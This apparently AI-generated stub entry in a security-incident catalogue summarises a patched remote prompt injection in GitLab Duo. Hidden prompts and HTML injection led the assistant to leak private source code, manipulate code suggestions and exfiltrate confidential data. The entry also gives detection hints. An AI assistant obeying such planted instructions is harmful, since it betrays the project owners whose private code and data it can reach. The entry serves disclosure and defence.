Remote Prompt Injection in GitLab Duo Leaks Source Code
Published Thu, May 22nd, 2025
Platforms
Summary
A remote prompt injection vulnerability in GitLab Duo allowed attackers to steal source code from private projects, manipulate code suggestions, and exfiltrate confidential information. The attack chain involved hidden prompts, HTML injection, and exploitation of Duo's access to private data. GitLab has since patched both the HTML and prompt injection vectors.
Affected Services
N/A
Remediation
None required. GitLab has patched the vulnerability.
Tracked CVEs
No tracked CVEs
References
Contributed by https://github.com/korniko98
Entry Status
Stub (AI-Generated)
Disclosure Date
Wed, Feb 12th, 2025
Exploitability Period
Until 2025/02/12
Known ITW Exploitation
-
Detection Methods
Monitor for unusual or unexpected HTML content in GitLab Duo responses. Watch for suspicious network requests originating from GitLab pages, especially those containing base64-encoded data.
Piercing Index Rating
-
Discovered by
Omer Mayraz, Legit Security
